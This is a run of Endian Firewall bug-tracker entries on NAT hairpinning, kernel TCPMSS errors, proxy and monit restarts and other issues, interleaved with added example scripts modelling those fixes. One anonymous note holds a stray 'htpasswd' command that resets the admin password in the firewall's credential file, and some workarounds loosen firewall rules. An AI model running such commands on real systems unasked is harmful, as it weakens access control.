packets will return directly from the target to the source, whenever they are in the same subnet

portfw rule should somehow automatically create a
non-stateful GREEN -> GREEN allow rule for that specific port/target and target-subnet as source.
little problem is that PORTFWACCESS is stateful.

maybe PORTFWACCESS should become non-stateful at all (?)
(0001757)
peter-endian   
2008-10-27 19:49   
Workaround is to configure hosts with their public domain in Network > Hosts and make them point to internal ip addresses, which makes the portforward work for machines in green

another workaround:
edit /etc/rc.d/rc.firewall
search for PORTFWACCESS
remove -m state --state NEW

resolution of this issue is not scheduled right now, please use the workarounds instead
(0001778)
yokomaka   
2008-11-06 13:23   
Thanks for pointing out the workarounds.

1) Works fine for us, however it does not really solve our problem. We have one external IP and forward multiple ports to different internal machines. I don't know how to do this with the given solution as it would only allow me to point a hostname to one internal IP, independent of the port.

2) Does not seem to work for me with 2.2RC3. I changed the line
"iptables -A FORWARD -m state --state NEW -j PORTFWACCESS"
to "iptables -A FORWARD -j PORTFWACCESS"
and rebooted the firewall.
Is there anything else that I missed to get this working?
(0003755)
peter-endian   
2010-02-09 14:23   
well. the attempt to solve this issue with a non-stateful rule is definitively not solving the problem, since the target will answer with its own ip-address and will not be translated back to the target ip address, because the answer does not pass the DNAT'ing device.

So the 2 possibilities to solve this are:

1) Configure your internal DNS (dns proxy) in order that access to the host which points to your external portforwarded ip will point to the green ip. So traffic will go directly to the target and do not pass the DNAT rule.

2) Create a matching SNAT rule for your DNAT rules in order that traffic coming from the same subnet as the DNAT target and going to the DNAT target, will be SNAT'ed to the firewall's ip address of the target subnet.
So answers will be forced to go back passing the firewall. However you will see connections coming always from your firewall instead of your internal ip.


example for 2:

DNAT rule:
portforward from 80.80.80.80:25 -> 192.168.0.10:25
firewall has ip: 192.168.0.1

SNAT rule:
source: 192.168.0.0/24
destination: 192.168.0.10
dest-port: 25
NAT to 192.168.0.1
(0006122)
icedburn   
2011-04-15 10:36   
Hi,
May I ask: does this issue have any update? My client has the same problem and we are trying to solve their problem. We have tried what peter gave, but the problem still arises.
Hope to hear from you guys.. thanks.
(0006966)
Dj_GL   
2011-07-12 18:53   
(edited on: 2011-07-12 18:54)
Instead of adding rules for every private IP I've added a single SNAT rule
source: 192.168.0.0/24
destination: 192.168.0.0/24
NAT to 192.168.0.1

That seems to work for me but does it maybe have some unwanted side-effects?
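
Possibility 2 from the notes above, traced packet by packet as an added example (a model written for this page, not Endian's code). The addresses 80.80.80.80, 192.168.0.10 and 192.168.0.1 and port 25 come from peter-endian's example; the client addresses and the source port are constructed.

```python
import ipaddress
from collections import namedtuple

Packet = namedtuple("Packet", "src sport dst dport")

GREEN = ipaddress.ip_network("192.168.0.0/24")
FW_GREEN_IP = "192.168.0.1"   # firewall address in GREEN (from the note)
PUBLIC_IP = "80.80.80.80"     # RED address carrying the port forward (from the note)
SERVER_IP = "192.168.0.10"    # DNAT target (from the note)
PORT = 25


def firewall_forward(pkt, hairpin_snat, nat_table):
    """Apply the DNAT rule and, optionally, the matching SNAT rule to a request."""
    out = pkt
    if out.dst == PUBLIC_IP and out.dport == PORT:
        out = out._replace(dst=SERVER_IP)                      # DNAT (port forward)
    if (hairpin_snat and ipaddress.ip_address(out.src) in GREEN
            and out.dst == SERVER_IP and out.dport == PORT):
        out = out._replace(src=FW_GREEN_IP)                    # SNAT to the firewall's GREEN IP
    # Connection tracking: remember the original packet, keyed by the expected reply tuple.
    nat_table[(out.dst, out.dport, out.src, out.sport)] = pkt
    return out


def server_reply(request):
    """The server answers whatever source address it saw."""
    return Packet(request.dst, request.dport, request.src, request.sport)


def deliver_reply(reply, nat_table):
    """Route the reply: same-subnet destinations are reached directly, bypassing the firewall."""
    if ipaddress.ip_address(reply.dst) in GREEN and reply.dst != FW_GREEN_IP:
        return reply, "direct on GREEN"                        # never translated back
    original = nat_table[(reply.src, reply.sport, reply.dst, reply.dport)]
    translated = Packet(original.dst, original.dport, original.src, original.sport)
    return translated, "via firewall"


def client_accepts(request, reply):
    """A TCP client only accepts a reply from the address and port it connected to."""
    return reply == Packet(request.dst, request.dport, request.src, request.sport)


def hairpin(client_ip, hairpin_snat):
    """Trace one request/reply pair and report what each side sees."""
    nat_table = {}
    request = Packet(client_ip, 40000, PUBLIC_IP, PORT)        # constructed source port
    forwarded = firewall_forward(request, hairpin_snat, nat_table)
    reply, path = deliver_reply(server_reply(forwarded), nat_table)
    return {"server_sees": forwarded.src, "reply_path": path,
            "reply_src": reply.src, "accepted": client_accepts(request, reply)}


if __name__ == "__main__":
    for client, snat in (("192.168.0.50", False), ("192.168.0.50", True), ("203.0.113.7", False)):
        print(client, "snat" if snat else "no-snat", hairpin(client, snat))
```

With the SNAT rule the server logs the firewall's address instead of the real internal client, which is the trade-off the note describes.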






View Issue Details
4221 [Endian Firewall] Kernel block have not tried 2011-12-09 16:17 2013-02-21 04:52
ardit-endian  
 
normal  
confirmed 2.4.1  
open  
none    
none  
   
kernel : xt_TCPMSS: bad length (1024 bytes) + PATCH
Hi,

A customer with 500+ concurrent voip connections (a 16 cores workstation) says that the firewall "crashed" due to heavy voip traffic.

When logged in this is what I recall interesting:
http://pastie.org/2991370

Leaving aside the other problems (I already know what and why) and focusing on the kernel message, I found that it is related to netfilter, and the matching rule (MSS) is located in mangle, chain:

Chain FORWARD (policy ACCEPT 231M packets, 33G bytes)
 pkts bytes target prot opt in out source destination
1217K 66M TCPMSS tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x02 TCPMSS clamp to PMTU


http://rhkernel.org/#RHEL6+2.6.32-71.18.2.el6/net/netfilter/xt_TCPMSS.c
    /* Since it passed flags test in tcp match, we know it is is
       not a fragment, and has data >= tcp header length. SYN
       packets should not contain data: if they did, then we risk
       running over MTU, sending Frag Needed and breaking things
       badly. --RR */
    if (tcplen != tcph->doff*4) {
        if (net_ratelimit())
            printk(KERN_ERR "xt_TCPMSS: bad length (%u bytes)\n",
                   skb->len);
        return -1;
    }


So the error is caused for 2 reasons:

1) Syn packets which contain data (normally not allowed)
2) TCP header larger than the packet itself

It's hard to reproduce because this kind of traffic is produced only on rare occasions; however, there is already a patch for this problem (I believe it's included in the vanilla).

PATCH:

http://www.gossamer-threads.com/lists/linux/kernel/1180390?do=post_view_threaded
log.txt (2,467) 2011-12-09 16:22
https://bugs.endian.com/file_download.php?file_id=895&type=bug
There are no notes attached to this issue.
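
The length check quoted in this report, re-implemented in user space as an added example (not the kernel's or Endian's code) so that captured SYN packets can be sorted into the two causes listed above. The packet builder, addresses, ports and sample packets are constructed; the flag match follows the "tcp flags:0x06/0x02" rule shown in the chain listing.

```python
import struct

SYN, RST = 0x02, 0x04


def build_ipv4_tcp(flags=SYN, doff_words=5, options=b"", payload=b""):
    """Build a constructed IPv4/TCP packet; checksums stay zero since only lengths matter."""
    tcp = struct.pack("!HHIIBBHHH", 40000, 5060, 1, 0,
                      doff_words << 4, flags, 65535, 0, 0) + options + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes([192, 0, 2, 1]), bytes([198, 51, 100, 2]))
    return ip + tcp


def tcpmss_length_check(packet):
    """Return (verdict, detail) for one IPv4 packet, following the quoted check."""
    if len(packet) < 20 or packet[0] >> 4 != 4 or packet[9] != 6:
        return ("skip", "not IPv4/TCP")
    ihl = (packet[0] & 0x0F) * 4
    tcplen = len(packet) - ihl          # bytes from the start of the TCP header
    if ihl < 20 or tcplen < 20:
        return ("bad length", "TCP header truncated")
    flags = packet[ihl + 13]
    if flags & (SYN | RST) != SYN:      # the rule only matches SYN without RST
        return ("skip", "rule does not match (flags 0x06/0x02)")
    doff_bytes = (packet[ihl + 12] >> 4) * 4
    if tcplen > doff_bytes:             # cause 1: SYN packet that contains data
        return ("bad length", "SYN carries %d bytes of data" % (tcplen - doff_bytes))
    if tcplen < doff_bytes:             # cause 2: TCP header larger than the packet
        return ("bad length", "data offset %d exceeds TCP length %d" % (doff_bytes, tcplen))
    return ("clamp", "header-only SYN, MSS option may be rewritten")


# Constructed samples. The second one is 1024 bytes long, like the logged packet.
SAMPLES = {
    "syn_with_mss_option": build_ipv4_tcp(doff_words=6, options=b"\x02\x04\x05\xb4"),
    "syn_with_data": build_ipv4_tcp(payload=b"A" * 984),
    "syn_oversized_doff": build_ipv4_tcp(doff_words=15),
    "ack_with_data": build_ipv4_tcp(flags=0x10, payload=b"x" * 100),
}


def audit(samples):
    """Map each sample name to its verdict."""
    return {name: tcpmss_length_check(pkt) for name, pkt in samples.items()}


if __name__ == "__main__":
    for name, result in audit(SAMPLES).items():
        print("%-22s %s: %s" % (name, result[0], result[1]))
```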





View Issue Details
4531 [Endian Firewall] Proxy HTTP major always 2013-02-19 00:35 2013-02-19 00:50
Sheldmandu Any  
Any  
normal Any  
new 2.5  
open  
none    
none  
   
Policy Routing not working with HTTP Proxy turned on
Network Policy Routing does not work when HTTP Proxy is enabled and access is through the HTTP Proxy (only tested transparent proxy).
Setup 2 WAN (Red) interfaces.
Enable HTTP Proxy and set to transparent on Green.
Create a Policy Route to route HTTP traffic via the additional uplink (not the main one).
Go to whatismyip.com to see your IP address. It's still that of the main uplink.
Turn off the HTTP Proxy or change to non-transparent on Green.
Go to whatismyip.com to see your IP address. Notice that it is now of the additional uplink (as it should be).
Product version is 2.5.1
Notes
(0008380)
Sheldmandu   
2013-02-19 00:48   
Having done some further research I worked out the issue and arguably it's "by design". The Policy Routing takes place AFTER the HTTP Proxying and due to this you need to have the FROM set to LOCAL in your Policy Routing rule. The policy routing then works fine.

There is still a problem when you want for example to have everything from your DMZ Orange network going via a different uplink. There is no way to specify a Policy Routing rule to make everything from the DMZ go via a different uplink using Policy Routing if you're proxying the HTTP traffic from the DMZ. Perhaps this is more a documentation issue rather than anything else.
(0008381)
Sheldmandu   
2013-02-19 00:50   
This issue is effectively a duplicate of issue 4353 and issues 3305. Issue 3305 explains the solution.





View Issue Details
4530 [Endian Firewall] Network related (VPN, uplinks) crash always 2013-02-12 23:52 2013-02-13 00:11
mario79 Endian community  
 
high 2.5.1  
new 2.5  
open  
none    
none  
   
Dual wan fail...
Hi all.

I have a problem with dual wan.

I have 4 network interfaces:
eth0 - Green
eth1 - Orange
eth2 - Blue
eth3 - Red
eth5 - other

You configure the interfaces, which will eth5 main backup.

Disconnect the main interface, but does not activate the backup link.


Thank you.
Endian Community 2.5.1.
config gui.zip (189,559) 2013-02-12 23:52
https://bugs.endian.com/file_download.php?file_id=1041&type=bug
Notes
(0008370)
mario79   
2013-02-13 00:11   
Attach more information.

ping google.com -I eth5
PING google.com (190.212.166.24) from 165.98.68.227 eth5: 56(84) bytes of data.
From host227-68-98-165.movistar.com.ni (165.98.68.227) icmp_seq=0 Destination Host Unreachable
From host227-68-98-165.movistar.com.ni (165.98.68.227) icmp_seq=1 Destination Host Unreachable
From host227-68-98-165.movistar.com.ni (165.98.68.227) icmp_seq=2 Destination Host Unreachable
From host227-68-98-165.movistar.com.ni (165.98.68.227) icmp_seq=4 Destination Host Unreachable


root@srv:~ # ping google.com -I eth3
PING google.com (190.212.166.25) from 165.98.68.34 eth3: 56(84) bytes of data.
64 bytes from 25-166-212-190.enitel.net.ni (190.212.166.25): icmp_seq=0 ttl=57 time=2.07 ms
64 bytes from 25-166-212-190.enitel.net.ni (190.212.166.25): icmp_seq=1 ttl=57 time=1.72 ms
64 bytes from 25-166-212-190.enitel.net.ni (190.212.166.25): icmp_seq=2 ttl=57 time=1.73 ms
64 bytes from 25-166-212-190.enitel.net.ni (190.212.166.25): icmp_seq=3 ttl=57 time=1.69 ms

Sorry for my english, i use a translate tool.

Thanks.





View Issue Details
1266 [Endian Firewall] GUI feature always 2008-08-09 06:17 2013-02-09 22:53
kfason  
 
normal  
new 2.2-rc2  
open  
none    
none  
   
Add OpenDNS support
OpenDNS is a great service that should be included in EFW. Some ideas I have are in System | Network Configuration | DNS page. In addition to auto or manual, add checkbox to use OpenDNS servers. Maybe include ability of sort order. i.e. use OpenDNS first, then the DNS servers provided by DHCP on red or vice versa.

The other place would be under Services | Dynamic DNS. If a DDNS is setup, have a checkbox to also update the OpenDNS service for the additional stuff such as stats.
http://www.opendns.com
Notes
(0001522)
leward   
2008-08-12 02:41   
OpenDNS is supported as with any DNS service you want to use. To set the DNS you need to go to the System tab in the GUI and click Network Configuration. When you get to step 4 you need to change the DNS radio button to "manual" and then when you click next to Step 5 it will ask you what the IP addresses are for the Pri/Sec name servers, this is where you put in the OpenDNS addresses.

Hope this helps.
(0001523)
kfason   
2008-08-13 00:45   
correct and that is what I've done. I'm asking that the OpenDNS servers be a checkbox option. Also requesting that EFW register the IP as it does with a DDNS service.
(0008369)
cmateski   
2013-02-09 22:44   
It would also be nice to add the login account information to take advantage of the additional features the service offers.

This issue is over four years old. Did it get resolved in another ticket or is it on the roadmap? Please advise.





View Issue Details
4307 [Endian Firewall] GUI tweak always 2012-03-28 13:37 2013-02-07 17:25
baldy  
davide-endian  
normal  
feedback 2.5  
reopened  
none    
none  
   
Time value for Uptime is not displayed correctly
On the Dashboard the system uptime is shown incorrectly.

The value for hours is the total amount of hours the system is up and running, not the value that should be shown when the days are subtracted.
In the attached picture the system uptime is shown as

32 days 790 hours and 46 minutes

Correct calculation would be 32 days 21 hours and 46 minutes
GUI Time.jpg (5,725) 2012-03-28 13:37
https://bugs.endian.com/file_download.php?file_id=922&type=bug
Notes
(0007816)
davide-endian   
2012-04-05 12:21   
Fixed in efw-dashboard 2.9.2
(0008367)
Sota   
2013-02-07 17:24   
I'm running EFW 2.5.1 with efw-dashboard 2.7.10-0, how do I get efw-dashboard 2.9.2? I've tried running efw-upgrade but it just says "no interesting upgrades available"

Thanks.





View Issue Details
3746 [Endian Firewall] GUI minor always 2011-05-16 23:13 2013-02-03 01:59
gmar_87  
 
normal  
new 2.4.1  
open  
none    
none  
   
Traffic graphs limited to 1.2 MBps
Traffic graphs do not show speeds greater than 1.2 MBps.
When traffic exceeds 1.2 MBps the graph is not plotted (see screenshot attached).
I was downloading at 4MBps to test this and the outgoing line (blue) disappeared from the graph.
This happens on 2.3, 2.4 and 2.4.1 installations.
We have a 40Mbps/40Mbps connection and would like to correct graphical representation.
Endian2-4-1_TrafficGraphs.jpg (56,476) 2011-05-16 23:13
https://bugs.endian.com/file_download.php?file_id=719&type=bug
Notes
(0008365)
gmar_87   
2013-02-03 01:47   
Decided to re-visit this and found the issue :)

There is a hard-coded limit for traffic RRD's in /usr/local/bin/makegraphs.pl
I have changed this limit from 1.25Mbps to 1Gbps and confirmed traffic graphs now display correctly.

The following steps change traffic graph limits to 1Gbps and reset the graphs (old data no longer shown).

1. Open /usr/local/bin/makegraphs.pl
2. Locate "sub updateifdata" function
3. Replace:
"DS:incoming:ABSOLUTE:600:0:1250000",
"DS:outgoing:ABSOLUTE:600:0:1250000",

with

"DS:incoming:ABSOLUTE:600:0:1000000000",
"DS:outgoing:ABSOLUTE:600:0:1000000000",

4. Delete or rename existing traffic RRD's in /var/log/rrd (eg. RED.rrd, GREEN.rrd)
5. Execute /usr/local/bin/makegraphs.pl
6. Browse to traffic graphs in EFW web interface and confirm traffic graphs have been reset. You may need to clear your browser cache or press Ctrl+F5
7. Simulate traffic by transferring a large file from your LAN to your EFW box via SCP and check graphs.
(0008366)
gmar_87   
2013-02-03 01:59   
BTW, can you please release this patch as the issue still exists in 2.5.1





View Issue Details
4524 [Endian Firewall] Endian Firewall minor N/A 2013-01-31 01:15 2013-01-31 01:15
pcphilippe1  
 
normal  
new 2.2  
open  
none    
none  
   
Unable to upgrade
Hello every time I run the Smart upgrade command I get this conflict

error: file /home/httpd/html/include/servicesubscriber.js from install of efw-guilib-2.4.3-0.endian5 conflicts with file from package efw-base-2.6.127.2-1.endian9
There are no notes attached to this issue.





View Issue Details
4523 [Endian Firewall] Documentation minor always 2013-01-30 20:01 2013-01-30 20:01
yhenao endian  
2.5  
normal 2.5  
new 2.5  
open  
none    
none  
   
There is not dashboard.cgi
Hello I have found the dashboard.cgi but it is not possible. Before I had on /home/httpd/cgi-bin a dashboard.cgi file, but don't now.

I have seen a /manage/dashboard on my web browser, but I cannot find it.

Could you tell me where it is?

Best regards,

Yanmidt
There are no notes attached to this issue.





View Issue Details
4522 [Endian Firewall] GUI minor N/A 2013-01-13 03:52 2013-01-13 03:52
marioeirea  
 
normal  
new 2.5  
open  
none    
none  
   
Ability to allow and deny specific URLs from GUI
Would be nice if the GUI was extended to allow modification of exceptionurllist and bannedurllist from content filter profile editor.
There are no notes attached to this issue.





View Issue Details
4521 [Endian Firewall] Other Services minor always 2013-01-10 20:00 2013-01-10 20:00
danw-rite  
 
high  
new 2.5  
open  
none    
none  
   
Traffic Monitoring
When I turn on traffic monitoring and then click on the administrative interface and try to browse to it, I never make it there. The error is that the page is not available.
I go to services and then traffic monitoring, enable traffic monitoring and then click on the link to the administrative interface. The web page then errors out.
There are no notes attached to this issue.





View Issue Details
3853 [Endian Firewall] Proxy HTTP major always 2011-06-03 12:10 2012-12-24 16:32
datapharmer  
lorenzo-endian  
normal  
feedback 2.4.1  
open  
none    
none  
   
transparent proxy does not start properly at boot
I am running endian 2.4.1 community edition (2.6.32.25-57.e40.i586) on a dell poweredge 1850. The proxy is configured to be transparent with havp and dansguardian, squid and content filtering enabled. When booting, no users can access the internet, there are no messages or responses to the browser, it is as if the proxy is not running at all, but internal systems that are set to bypass the transparent proxy can get to the internet just fine. Switching the proxy to be non-transparent, turning it off, back on, and then switching to transparent resolves the issue, but this is a pretty big problem if there isn't someone there to perform this from the GUI.
The problem also sometimes occurs if there are changes made to the proxy settings that cause it to need to restart, repeating the same process of switching to non-transparent, stopping, starting, and switching back to transparent seems to work in this situation as well.
Notes
(0006867)
datapharmer   
2011-06-30 18:17   
Had to shut down and later cold boot due to a power issue, and confirmed that this bug is repeatable... a simple acknowledgment of this problem would be appreciated. It is very disconcerting knowing that internet will be down for the entire building if things get rebooted unless someone logs in and manually toggles a switch.
(0006875)
datapharmer   
2011-07-01 15:32   
For anyone else that runs into this:
symptoms: squid (web proxy), havp (anti-virus), and dansguardian (content filter) do not start at boot. Switching proxy from transparent to non-transparent and switching back starts the services.
Fix: make havp chkconfig aware, copy havp.conf to havp.config, test that both services start manually from the commandline. make sure squid ports are explicitly allowed from green interface in system access firewall, make sure squid starts from the commandline. Reboot, confirm it works now.
(0006893)
lorenzo-endian   
2011-07-06 12:37   
Hi datapharmer,

could I ask you if there is any error in the logs?

Thanks in advance!

Lo





View Issue Details
4452 [Endian Firewall] Other Services major always 2012-09-25 08:53 2012-12-24 16:29
luke-endian  
 
normal  
new 2.5  
open  
none    
none  
   
monit does not restart dansguardian correctly
Hi guys
if you restart dansguardian using "monit restart dansguardian", this procedure fails 8/10 times. The same problem occurs if you change the content filter configuration from the GUI and then press the apply button: when jobsengine tells monit to restart the service you can see that port 9999 is used by dansguardian, and if you run "ps aux |grep dansguardian" you can see the dansguardian processes, but in /var/run the dansguardian.pid file is empty!
Monit checks that file to verify whether dansguardian is running or not, and if that file is empty monit thinks that the process is dead and runs only the start process and not the stop, so until you kill all the DansGuardian processes and delete the /var/run/dansguardian.pid file, monit is unable to start the dansguardian service. This problem occurs on 2.5 macro and 2.5 intel
monit_dg (4,505) 2012-09-25 08:54
https://bugs.endian.com/file_download.php?file_id=989&type=bug
Notes
(0008197)
luke-endian   
2012-09-25 08:56   
We've found a workaround:
in /etc/monit.d/dansguardian.conf
change the start parameter with:
 start program = "/bin/bash -c 'rm /var/run/dansguardian.pid; killall -9 dansguardian; /etc/init.d/dansguardian start'"
(0008354)
daniele-endian   
2012-12-18 15:37   
this has become a major issue
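
The state reported in this issue (dansguardian processes alive, /var/run/dansguardian.pid empty, so monit only runs "start") can be detected before a restart is attempted. The following is an added example, not Endian's code: the function name and state labels are assumptions, and the live PID list can be passed in so the check runs without the daemon present.

```shell
#!/bin/sh
# Added example (not Endian's code): classify the pidfile/process mismatch
# reported in this issue. Function name and state labels are assumptions.
#
# pidfile_state PIDFILE [LIVE_PIDS]
#   PIDFILE    e.g. /var/run/dansguardian.pid
#   LIVE_PIDS  space-separated PIDs of the daemon's running processes.
#              When the argument is omitted they are looked up with pidof.
# Prints one word:
#   running   the recorded PID is one of the live processes
#   stopped   nothing recorded, nothing running
#   stale     a PID is recorded but no process is running
#   orphaned  processes are running that the pidfile does not account for
#             (empty, missing or wrong pidfile): the state reported here
#   corrupt   the pidfile holds something other than a number
DAEMON=${DAEMON:-dansguardian}

pidfile_state() {
    pidfile=$1
    if [ "$#" -ge 2 ]; then
        live=$2
    else
        live=$(pidof "$DAEMON" 2>/dev/null || true)
    fi

    # Read the first line of the pidfile, if it has any content at all.
    recorded=""
    if [ -s "$pidfile" ]; then
        recorded=$(head -n 1 "$pidfile" | tr -d '[:space:]')
    fi

    # Anything containing a non-digit is not a PID.
    case $recorded in
        *[!0-9]*) echo corrupt; return 0 ;;
    esac

    for p in $live; do
        if [ -n "$recorded" ] && [ "$p" = "$recorded" ]; then
            echo running
            return 0
        fi
    done

    if [ -n "$live" ]; then
        echo orphaned
    elif [ -n "$recorded" ]; then
        echo stale
    else
        echo stopped
    fi
}

# Constructed demonstration: an empty pidfile next to two live PIDs,
# then the same pidfile holding the parent PID.
demo_dir=$(mktemp -d)
: > "$demo_dir/dansguardian.pid"
echo "empty pidfile, processes alive: $(pidfile_state "$demo_dir/dansguardian.pid" "4101 4102")"
echo 4101 > "$demo_dir/dansguardian.pid"
echo "pidfile matches parent:         $(pidfile_state "$demo_dir/dansguardian.pid" "4101 4102")"
rm -rf "$demo_dir"
```

Only the "orphaned" result corresponds to the failure described above; "stale" is the ordinary leftover pidfile that a plain start handles.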





View Issue Details
4520 [Endian Firewall] Endian Firewall minor have not tried 2012-12-19 09:44 2012-12-19 09:51
rvc.rajkumar  
 
normal  
new 2.5  
open  
none    
none  
   
Want To Allow External SqlServer
I want my firewall to allow all internal ip(192.168.2.---)
to access the sql server outside the firewall different ip(**.**.***.*9)
There are no notes attached to this issue.





View Issue Details
4519 [Endian Firewall] Log and Statistics crash have not tried 2012-12-17 14:06 2012-12-17 14:06
mario79 Endian community  
 
urgent 2.5.1  
new 2.5  
open  
none    
none  
   
full /var/log/
Good day.

I have problem with internet, with the proxy users, then, i watch on Dashboard, that the partition /var/log/ is full. For resolved this problem, disable proxy.

How to delete the logs?, What is the path?

May i change the partition /var/log in other partition /var/log2? ¿how to?

Thanks, and sorry for my english.
There are no notes attached to this issue.





View Issue Details
4518 [Endian Firewall] Intrusion Prevention minor always 2012-12-17 07:32 2012-12-17 07:32
simontkksimontkk  
 
normal  
new 2.5  
open  
none    
none  
   
Intrusion prevention system not able to generate log./ no live log
Version:2.5.1

Dear All,

First:
Currently I face a problem: my live log for Intrusion Prevention is not coming out although I have already activated the Intrusion Prevention system under "services".
Can anyone guide me, where should I activate this feature?

Second:
Previously, I also faced a problem with no log being generated for the firewall. The firewall log will only come out after I restart the firewall again.

There are no notes attached to this issue.





View Issue Details
4470 [Endian Firewall] Network related (VPN, uplinks) minor always 2012-10-19 10:03 2012-12-04 04:27
mhLearn  
 
normal  
new 2.5  
open  
none    
none  
   
Inter-zone Traffic And Policy Routing Issue
Hi,

Not sure if this is a bug or it was supposed the way on version 2.5.1.

Traffic from Orange zone to Green zone on open ports was failed when Policy Routing was applied to Orange zone too.

By just setting up a rule on Inter-zone Traffic, where
            Orange -> Green, <ports>
the traffic would be dropped, as logged in firewall log as "ZoneFW.Drop"

To solve this, do following,

1. Setup Static Routing, and enable it
      Source Network: <Orange Zone Net IP/CIDR>
      Destination Network: <Green Zone Net IP/CIDR>
      Route Via -> Static IP : <Green Zone Gateway IP>

2. Setup Inter-zone Traffic, and enable it
      Orange -> Green, <ports>

3. Apply the Policy Routing that you want

Doesn't matter of the steps sequence, once all setup properly, it would work.

 
In my case, Endian Firewall was setup with BLUE, ORANGE and GREEN Zones.

The Policy Routing was setup to divert all traffic from ORANGE and BLUE zone to use 2nd uplink connection, where GREEN zone was using main uplink card.
There are no notes attached to this issue.





View Issue Details
4390 [Endian Firewall] Network related (VPN, uplinks) crash have not tried 2012-07-05 14:58 2012-12-04 04:25
mhLearn  
lorenzo-endian  
normal  
feedback 2.5  
open  
none    
none  
   
PPPoE Connection Failed
After reboot the system few times within hour through the webgui, the pppoe connection was connected for 0.2 minutes, and then disconnected. This kept repeating.
EFW 2.5.1
EFW_PPPoE_Crashed.txt (13,035) 2012-07-05 14:58
https://bugs.endian.com/file_download.php?file_id=962&type=bug
Notes
(0007939)
mhLearn   
2012-07-06 05:07   
Prior before the crash,
1. Tried to setup backup uplink which have same DNS with main uplink. Reboot system. Backup uplink failed to make connection.
2. Then tried with different connection type, Ethernet Static, PPPT, Ethernet DHCP, and also different NICs for backup uplink. Reboot system. Backup uplink failed to connect.
3. Removed backup uplink setup through webgui and reboot system.

Thereafter, the main uplink PPPoE problem start.

Other details,
Motherboard : Asus P3V133
RAM: 640MB
NIC: 4 units
(0007940)
mhLearn   
2012-07-06 05:22   
Possible issue link to reported case 0002526
(0007944)
lorenzo-endian   
2012-07-06 13:12   
Hi mhLearn,

do you have the chance to test the system with a pppoe concentrator attached on the uplink?

here you can find a guide to install a pppoe concentrator: http://www.lo-online.net/cs/install-pppoe-concentrator-on-ubuntu-server-11-10.html

bye!

Lo
(0007995)
mhLearn   
2012-08-08 05:32   
Will have a look in it and update here. thx
(0008063)
lorenzo-endian   
2012-09-04 09:34   
hi mhLearn,

the guide has been moved there: http://hidden-bits.com/?p=19

bye!

Lo
(0008241)
mhLearn   
2012-10-19 09:27   
Hi lorenzo,

thanks for your suggestion. The download link in the page doesn't work.

Anyway, the 2nd uplink has been setup as Ethernet Static card to avoid the possible issue, i.e.
    1. Main uplink connection is controlled and initiated by Endian Firewall, and
    2. 2nd uplink connection is controlled and initiated by modem.

thx





View Issue Details
4514 [Endian Firewall] Endian Firewall feature N/A 2012-12-04 03:59 2012-12-04 04:25
mhLearn  
 
normal  
new 2.5  
open  
none    
none  
   
Blocking Unknown MAC With Static IP
Hi,

Just finding a way to block any unknown device configured with static IP and got connected to internet, either via wireless or wired.

Currently, even with "Allow Only Fixed Leases" enabled on DHCP setup, if a device was set with static IP, it is still able to get internet access or access other same zone computers.

Is there anywhere to block it? Thanks
There are no notes attached to this issue.





View Issue Details
4478 [Endian Firewall] Endian Firewall major always 2012-11-01 19:34 2012-12-03 17:40
Tecnic  
 
normal  
new 2.5  
open  
none    
none  
   
Endian Firewall Issues on VPN traffic
The Endian Firewall 2.5.1 "VPN Traffic" with this problem in establishing safety rules.
Rules created based on the source MAC, IP and User Open VPN does not work. Only works when used and the Origin and <any> Zone / Interface, in these two cases and can gain access.
There are no notes attached to this issue.





View Issue Details
4454 [Endian Firewall] Hotspot minor always 2012-09-26 14:51 2012-11-29 16:50
thomas-endian  
 
normal  
new 2.5  
reopened  
none    
none  
   
corrupt Next Button self-service report gui
Button “Next” under
Hotspot > Reports > SmartConnect Transactions
is corrupt; it creates the following error (message in the GUI: Not found):
Sep 26 16:02:56 ENDIAN-EE emi[5533]: _cp_on_http_error status: 404 message: The path '/manage/hotspotgui/selfservice/count-1 >= offset + offset_step' was not found. request_path: /manage/hotspotgui/selfservice/count-1 >= offset + offset_step handler: None
Any other buttons works…

Maybe the line 86 under
/usr/lib/python2.4/site-packages/endian/hotspotgui/web/templates/selfservice_list.mak
is not correct:
% if (count - 1) >= (offset + offset_step):
                    count-1 >= offset + offset_step
Notes
(0008201)
Anonymous   
2012-09-27 15:25   
(edited on: 2012-09-27 15:28)
htpasswd -m /var/efw/auth/users admin

(0008203)
luca-endian   
2012-09-28 07:58   
hi thomas,

could you add more details? A screenshot, I don't get exactly the point of this bug.

Thanks
(0008204)
thomas-endian   
2012-09-28 08:24   
hi luca,
please have a look in the zendesk ticket 2850, you can find a short MPEG movie in the first line/comment from the customer (4 MB file, therefore over this way). You can also find the access parameter in zendesk comment from 25. September 2012 15:25
(0008209)
daniele-endian   
2012-09-28 15:02   
Video of the issue uploaded on my dropbox:
https://dl.dropbox.com/u/67957000/Error.mpeg
(0008250)
thomas-endian   
2012-10-25 14:18   
any news?
(0008292)
daniele-endian   
2012-11-13 11:50   
FIX/Workaround

Edit the file
/usr/lib/python2.4/site-packages/endian/hotspotgui/web/templates/selfservice_list.mak

When you found this line:
count-1 >= offset + offset_step
As you can see there is a double "href" remove "href="count-1 >= offset + offset_step"" and save the file.





View Issue Details
4511 [Endian Firewall] Log and Statistics major always 2012-11-28 07:02 2012-11-28 07:02
goreXP  
 
urgent  
new 2.5  
open  
none    
none  
   
Cannot access HTTP and Content filter logs
When I access these "Proxy" from "Logs" menu:

Logs --> Proxy --> HTTP
Logs --> Proxy --> Content filter

I get a STOP sign img and "The Endian Management Interface encountered an error. Please contact an administrator." message.
http_proxy_log_viewer.png (58,387) 2012-11-28 07:02
https://bugs.endian.com/file_download.php?file_id=1034&type=bug
There are no notes attached to this issue.





View Issue Details
4508 [Endian Firewall] Hardware related (kernel, drivers, hardware) feature have not tried 2012-11-25 16:57 2012-11-25 16:57
bogdan1 ARM  
 
normal  
new 2.5  
open  
none    
none  
   
2.5.1 ARM
Hello

My question is,
Is it possible to run EFW community on ARM (raspberry Pi ).

Best regards



There are no notes attached to this issue.





View Issue Details
4350 [Endian Firewall] Uncategorized major random 2012-05-07 13:41 2012-11-22 20:43
marioeirea  
 
normal  
new  
open  
none    
none  
   
Dansguardian filtering slows pages loads
After operating for a while, dansguardian will slow filtered pages down to a crawl. Issuing the command "/etc/init.d/dansguardian restart" temporarily fixes the problem. This does not affect people on the allow list in the access policies which means this is a dansguardian problem. This is affecting clients on 2.5.1 and was not an issue in 2.4.1.
Notes
(0007862)
victorhugops   
2012-05-10 16:33   
Hi,

here we have the same problem !!!
